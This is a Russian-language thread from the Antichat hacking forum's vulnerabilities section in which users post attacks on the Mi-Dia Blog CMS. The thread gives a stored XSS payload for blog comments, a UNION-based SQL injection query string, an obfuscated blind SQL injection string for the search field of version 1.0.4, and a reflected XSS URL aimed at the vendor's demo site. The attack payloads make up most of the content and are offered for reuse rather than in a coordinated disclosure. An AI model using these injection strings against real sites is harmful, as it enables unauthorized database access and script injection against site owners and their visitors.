ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Mi-Dia Blog
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mi-Dia Blog
  #1  
Старый 08.11.2009, 06:27
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Mi-Dia Blog
Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.
Цитата:
[img]javascript:alert()[/img]
SQL Иньекция
Цитата:
?s=view&v=-1'+union+select+1,2,3,4,5,6,7,8,9+--+
Кода много, приведу тока фильтрациб.
PHP код:
$v htmlspecialchars($_GET['v']);  
$d htmlspecialchars($_GET['d']); 
 
Ответить с цитированием

  #2  
Старый 09.04.2010, 21:43
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию
product : Mi-Dia Blog v1.0.4
Blind SQL
search --->
mq=off
mysql = 5
Код:
xek%'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Последний раз редактировалось [x60]unu; 09.04.2010 в 21:55..
 
Ответить с цитированием

  #3  
Старый 09.04.2010, 22:25
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
еще пассивная xss
Код:
http://demo.mi-dia.co.uk/?s=search&tags=%3Cscript%3Ealert(/xss/)%3C/script%3E
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
cmd blog Дикс PHP, PERL, MySQL, JavaScript 13 16.04.2009 17:24
Уязвимости InTerra Blog Machine Dimi4 Сценарии/CMF/СMS 0 08.01.2009 00:31
Invision Community Blog 1.1.0 jusuf Форумы 1 14.07.2006 18:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ